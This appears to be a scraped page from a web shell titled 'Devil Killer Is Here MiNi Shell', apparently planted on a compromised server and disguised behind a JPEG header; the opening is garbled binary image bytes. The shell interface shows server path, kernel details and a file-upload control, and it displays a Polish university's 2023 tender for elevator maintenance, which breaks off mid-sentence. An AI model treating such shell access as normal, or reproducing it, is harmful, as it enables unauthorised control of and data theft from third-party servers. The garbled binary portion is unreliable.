JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230330/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230330/0015765601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przetarg nieograniczony na usługę serwisowania i konserwacji urządzeń dźwigowych zainstalowanych w obiektach Zachodniopomorskiego Uniwersytety Technologicznego w Szczecinie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZACHODNIOPOMORSKI UNIWERSYTET TECHNOLOGICZNY W SZCZECINIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 320588161</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Piastów 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">70-310</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@zut.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zut.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Nauka i edukacja </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przetarg nieograniczony na usługę serwisowania i konserwacji urządzeń dźwigowych zainstalowanych w obiektach Zachodniopomorskiego Uniwersytety Technologicznego w Szczecinie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d4de220d-cec5-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00157656</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d4de220d-cec5-11ed-9355-06954b8c6cb9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Składanie Zamawiającemu oferty (a także jej wycofanie) odbywa się przy użyciu<br/>Platformy e-Zamówienia, pod adresem: https://ezamowienia.gov.pl (zakładka „Oferty/wnioski”).<br/>2. Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB.<br/>3. Komunikacja pomiędzy Zamawiającym a Wykonawcą w postępowaniu, w sprawach innych niż składanie oferty np. składanie<br/>Zamawiającemu wniosków o wyjaśnienie SWZ odbywać się będzie drogą elektroniczną przy użyciu:<br/>1) Platformy e-Zamówienia, za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do<br/>komunikacji”) lub<br/>2) poczty elektronicznej: dzp@zut.edu.pl.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji”, o których mowa w ust 3 pkt 1 powyżej,<br/>wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). Maksymalny rozmiar plików<br/>przesyłanych za pośrednictwem poczty elektronicznej to 100 MB.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca chcący wziąć udział w<br/>postępowaniu, musi posiadać konto podmiotu Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat<br/>zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e<br/>Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl. 2. Przeglądanie i pobieranie publicznej treści<br/>dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>3. Sposób sporządzenia i przekazania ofert, innych oświadczeń i dokumentów wymaganych w niniejszym postępowaniu na<br/>podstawie SWZ musi być zgody z wymaganiami określonymi w:<br/>1) rozporządzeniu Prezesa Rady Ministrów z dn. 30.12.2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), zw. dalej „rozporządzeniem w spr. wymagań dla dokumentów<br/>elektronicznych”,<br/>2) rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dn. 23.12.2020r.<br/>w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od<br/>wykonawcy (Dz. U. z 2020 r. poz. 2415).<br/>4. Ofertę oraz inne oświadczenia i dokumenty, o których mowa w § 2 ust. 1 rozporządzenia w spr. wymagań dla dokumentów<br/>elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady<br/>Ministrów z dnia 12.04.2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i<br/>wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych.<br/>5. Ofertę oraz inne oświadczenia i dokumenty, o których mowa w § 2 ust. 1 rozporządzenia w sprawie wymagań dla dokumentów<br/>elektronicznych składa się, pod rygorem nieważności w formie elektronicznej (tj. przy użyciu kwalifikowanego podpisu,<br/>elektronicznego) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>6. Dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia w spr. wymagań dla dokumentów elektronicznych, sporządza się w<br/>postaci elektronicznej:<br/>1) w formatach danych określonych w przepisach rozporządzenia w sprawie Krajowych Ram Interoperacyjności (i przekazuje się<br/>jako<br/>załącznik) lub<br/>2) jako tekst wpisany bezpośrednio w treści wiadomości e-mail lub w treści „Formularza do komunikacji”. 7. Jeżeli przekazywane<br/>dokumenty elektroniczne, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu<br/>przepisów ustawy z dnia 16.04.1993r. o zwalczaniu nieuczciwej konkurencji, Wykonawca w celu utrzymania w poufności tych<br/>informacji, przekazuje je w wydzielonym i odpowiednio oznaczanym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku<br/>„Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>8. Formularze do komunikacji (na Platformie e-Zamówienia) umożliwiają dołączenie załącznika do przesyłanej wiadomości (przycisk<br/>„dodaj załącznik”).<br/>9. Możliwość korzystania z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e<br/>Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do<br/>zadawania pytań dotyczących treści SWZ wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>10. Wskazana w sekcji III.3.5) ogłoszenia poczta e-mail po stronie Zamawiającego jest standardową pocztą elektroniczną (Office365<br/>lub też znana pn. Microsoft365).<br/>11. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e–Zamówienia.<br/>12. Korzystanie z Platformy e-Zamówienia możliwe jest po zaakceptowaniu Regulaminu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna RODO została podana w załączniku nr 1 SWZ (zob. również dział II<br/>SWZ)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z klauzulą informacyjną RODO (załącznik nr 1 SWZ)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/ATG/1639/2022/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zgodnie z klauzulą informacyjną RODO (załącznik nr 1 SWZ) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50531400-0 - Usługi w zakresie napraw i konserwacji dźwigów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na usterkę/awarię</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Stawka robocizny kosztorysowej netto</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie niniejszego zamówienia ubiegać się mogą Wykonawcy, którzy spełniają określony <br/>w ramach art. 112 ust. 2 pkt. 4 ustawy PZP warunek dotyczący zdolności technicznej i zawodowej do należytego wykonania niniejszego zamówienia; tj. wykażą Zamawiającemu że dysponują odpowiednim tj. na poziomie określonym w ust. 2 niniejszego działu, doświadczeniem zawodowym.<br/>2.	Przy uwzględnieniu dodatkowych postanowień ust. 3 i 4 niniejszego działu, Zamawiający uzna wskazany w ustępie powyżej warunek udziału w niniejszym postępowaniu za spełniony, jeżeli Wykonawca wykaże Zamawiającemu fakt wykonania (ukończenia) lub nadal wykonywania minimum dwóch usług (z których każda jest zwana dalej USŁUGĄ), spełniających następujące cechy:<br/>1)	Każda z dwóch USŁUG została wykonana (ukończona) w okresie ostatnich trzech lat przed upływem terminu składania ofert w niniejszym postępowaniu (a jeżeli okres prowadzenia działalności przez Wykonawcę jest krótszy niż trzy lata, to w tym okresie). Powyższe wymaganie w niniejszym punkcie nie dotyczy USŁUGI/USŁUG, które są w trakcie wykonywania<br/>2)	Przedmiotem każdej z dwóch USŁUG było wykonanie lub jest (w przypadku, gdy Usługa - jest nadal wykonywana - w sposób powtarzający się lub ciągły) wykonywanie usług konserwacji, serwisowania lub naprawy (remontu) obejmującej minimum 25 urządzeń dźwigowych o wartości 100 000 zł netto (tj. bez podatku VAT). W przypadku, gdy przedstawiana do wykazania spełnienia warunku USŁUGA jest nadal wykonywana wskazana wyżej wartość 100 000 zł netto dotyczy USŁUGI w części już wykonanej. <br/>3)	Każda z USŁUG, o których mowa w pkt 1) – 2) powyżej jest USŁUGĄ, która została wykonana (a w przypadku jeszcze niezakończonej – jest wykonywana) należycie.<br/><br/>3.	Z zastrzeżeniem wyjątku wskazanego w ust. 4 pkt 1) niniejszego działu, obie USŁUGI wymagane na podstawie ust. 2 niniejszego działu muszą być USŁUGAMI wykonanymi lub wykonywanymi przez Wykonawcę, z tym że w przypadku Wykonawców, o których mowa w art. 58 ustawy PZP (Wykonawców wspólnie ubiegających się o zamówienie) wystarczające jest wykazanie faktu wykonania lub wykonywania USŁUGI tylko przez jednego z Wykonawców wspólnie ubiegających się o zamówienie, przy czym w takim przypadku również obie wymagane na podstawie ust. 2 niniejszego działu USŁUGI muszą być wykonane lub wykonywane przez tego (tego samego) Wykonawcę. <br/>4.	Stosownie do art. 118 ust. 1 ustawy PZP, w celu potwierdzenia spełniania wskazanego <br/>w ust. 2 niniejszego działu warunku udziału w niniejszym postępowaniu Wykonawca może również polegać na zdolnościach zawodowych (doświadczeniu) innych podmiotów (zwanych dalej PODMIOTEM TRZECIM) niezależnie od łączących go z nim stosunków prawnych, przy czym w niniejszym postępowaniu możliwość skorzystania ze wskazanego wyżej uprawnienia dopuszczalna będzie na następujących warunkach łącznie:<br/><br/>1)	W zakresie w jakim Wykonawca przy wykazywaniu spełnienia określonego w ust. 2 niniejszego działu warunku udziału w postępowaniu powołuje się na zdolności PODMIOTU TRZECIEGO -USŁUGI wymagane w ust. 2 niniejszego działu będą USŁUGAMI wykonanymi lub wykonywanymi przez ten PODMIOT TRZECI, przy czym obydwie te USŁUGI muszą być USŁUGAMI, które zostały wykonane przez jeden (ten sam) PODMIOT TRZECI;<br/>2)	PODMIOT TRZECI, na którego zdolności powołuje się Wykonawca przy wykazywaniu spełnienia określonego w ust. 2 niniejszego działu warunku udziału w niniejszym postępowaniu musi być tym podmiotem (PODMIOTEM TRZECIM), który jako podwykonawca Wykonawcy zrealizuje niniejsze zamówienie minimum w zakresie obejmującym wykonanie usługi konserwacji i naprawy urządzeń dźwigowych (minimalny wymagany przez Zamawiającego na podstawie art. 118 ust. 2 ustawy PZP obowiązek realizacji zamówienia przez PODMIOT TRZECI w zakresie wynikającym z udostępnionych Wykonawcy zdolności PODMIOTU TRZECIEGO w zakresie posiadanego przez ten podmiot doświadczenia, uzyskanego w wyniku realizacji USŁUGI); <br/>3)	W stosunku do PODMIOTU TRZECIEGO, o którym mowa w pkt 1) i 2) powyżej, <br/>na którego zdolności powołuje się Wykonawca przy wykazywaniu spełnienia określonego w ust. 2 powyżej warunku udziału w niniejszym postępowaniu nie będą zachodzić podstawy wykluczenia, o których mowa w dziale VII SWZ (w takim przypadku, ilekroć w dziale VII SWZ mowa o Wykonawcy - należy przez to rozumieć również PODMIOT TRZECI);<br/>4)	Informacja o zamiarze powołania się zasobami PODMIOTU TRZECIEGO przy wykazywaniu określonego w ust. 2 powyżej spełnienia warunku udziału w niniejszym postępowaniu musi zostać zakomunikowana Zamawiającemu (poprzez oświadczenie, o którym mowa w dziale IX SWZ) nie później niż w terminie składania ofert.<br/>5.	W kwestiach nie uregulowanych powyżej w niniejszym dziale, ocena spełnienia określonego tam warunku udziału w niniejszym postępowaniu następuje zgodnie z ustawą PZP <br/>oraz z uwzględnieniem dokumentów, o których mowa w dziale IX ust. 1 - 11 SWZ (stosownie <br/>do postanowień tam wskazanych dotyczących warunku udziału w postępowaniu). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">11.	Od Wykonawcy oferty najkorzystniejszej (najwyżej ocenionej) wymagane będą do złożenia, na odrębne wezwanie Zamawiającego w wyznaczonym przez Zamawiającego terminie (ustalonym stosownie do art. 274 ust. 1 ustawy PZP, nie krótszym jednak niż 5 dni), następujące oświadczenia i dokumenty, aktualne na dzień ich złożenia, potwierdzające spełnienie określonego w dziale VIII ust. 2 SWZ warunku udziału w niniejszym postępowaniu: <br/>1)	Wykaz ze wskazaniem wymaganych dwóch usług konserwacji, serwisowania lub naprawy (remontu) urządzeń dźwigowych (USŁUG), wymaganych na podstawie działu VIII ust. 2 SWZ, z podaniem w nim w odniesieniu do każdej z tych dwóch USŁUG jej rodzaju, wartości, daty wykonania(ukończenia), miejsca wykonania, a także podmiotu/podmiotów, na rzecz których każda z tych USŁUG została wykonana. Wyżej wskazane informacje będą wymagały podania <br/>w wykazie w takim zakresie, aby pozwalało to Zamawiającemu potwierdzić spełnianie<br/>wymogów określonych w dziale VIII ust. 2 SWZ , z wyjątkiem informacji, <br/>o których mowa w dziale VIII ust. 2 pkt 3) SWZ o należytym wykonaniu USŁUG (a jeżeli <br/>są nadal wykonywane - należytym wykonywaniu USŁUG), które to informacje podlegają wykazaniu w sposób wskazany w pkt 2) poniżej. Zaleca się, aby wezwany (Wykonawca oferty najwyżej ocenionej) przygotował i złożył ww. wykaz (zwany dalej WYKAZEM) wykorzystując do tego formularz, którego wzór stanowi załącznik nr 5 SWZ. Jeżeli Wykonawca wykazujący spełnienie określonego w dziale VIII ust. 2 SWZ warunku udziału w niniejszym postępowaniu powołuje się na doświadczenie w realizacji USŁUG wykonywanych wspólnie z innymi Wykonawcami WYKAZ może dotyczyć USŁUG, w których wykonaniu Wykonawca wykazujący spełnienie warunku bezpośrednio uczestniczył;<br/>2)	Dowody określające, że wymagane USŁUGI z WYKAZU spełniają wymóg określony <br/>w dziale VIII ust. 2 pkt 3) SWZ. Takimi dowodami są referencje lub inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, <br/>z zastrzeżeniem pkt 3) poniżej. W przypadku USŁUGI/USŁUG nadal wykonywanych, dowód należytego wykonywania jak wyżej musi być wystawiony w okresie ostatnich 3 miesięcy;<br/>3)	Zamiast wskazanych w pkt 2) powyżej dokumentów potwierdzających należyte wykonanie/wykonywanie USŁUGI/USŁUG, wystawionych przez podmiot/podmioty, na rzecz których usługi te były wykonane – Wykonawca może przedstawić również inne odpowiednie dokumenty, przy czym tyko wtedy, jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać dokumentów, o których mowa w pkt 2) powyżej. Obowiązek wykazania Zamawiającemu istnienia wyżej wskazanej przyczyny stanowiącej przeszkodę w złożeniu dokumentu lub dokumentów wymaganych na podstawie wyżej wskazanego pkt 2) niniejszego ustępu, należy do Wykonawcy.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Poza samą ofertą i dokumentami, o których mowa w sekcji V.5.7) ogłoszenia, w postepowaniu<br/>wymagane będzie przedłożenie:<br/>1) Oświadczenia Wykonawcy, o którym mowa w art. 125 ust. 1 ustawy PZP (a w przypadku<br/>oferty składanej przez Wykonawców wspólnie ubiegających się o zamówienie, oświadczenie<br/>takie każdego z nich). W przypadku, gdy wykazanie spełnienia określonego w sekcji V.5.4.) ust.<br/>2 ogłoszenia warunku udziału w niniejszym postępowaniu następuje zasobami<br/>(wykonanej/wykonywanej usłudze) PODMIOTU TRZECIEGO (więcej niż jednego PODMIOTU<br/>TRZECIEGO) - wskazane oświadczenie winien złożyć każdy taki PODMIOT TRZECI;<br/>2) Dowody na okoliczność, że Wykonawca/ PODMIOT TRZECI spełnił łącznie przesłanki, o<br/>których mowa w art. 110 ust. 2 ustawy PZP – przy czym tylko w przypadku, gdy w odniesieniu<br/>do Wykonawcy składającego ofertę (a w przypadku Oferty wspólnej składanej przez<br/>Wykonawców wspólnie ubiegających się o zamówienie, w odniesieniu do tego Wykonawcy, do<br/>którego) lub PODMIOTU TRZECIEGO ma miejsce sytuacja, o której mowa w art. 110 ust. 2<br/>ustawy PZP w zakresie podstaw wykluczenia, o których mowa w art. 108 ust. 1 pkt 1, 2 i 5<br/>ustawy PZP;<br/>3) Zobowiązanie PODMIOTU TRZECIEGO do oddania Wykonawcy niezbędnych zasobów na<br/>potrzeby realizacji niniejszego zamówienia lub inny podmiotowy środek dowodowy,<br/>potwierdzający, że Wykonawca realizując niniejsze zamówienie będzie dysponował<br/>niezbędnymi zasobami tego podmiotu (PODMIOTU TRZECIEGO) z informacjami stosownie do<br/>art. 118 ust. 4 ustawy PZP - przy czym tylko w przypadku, gdy 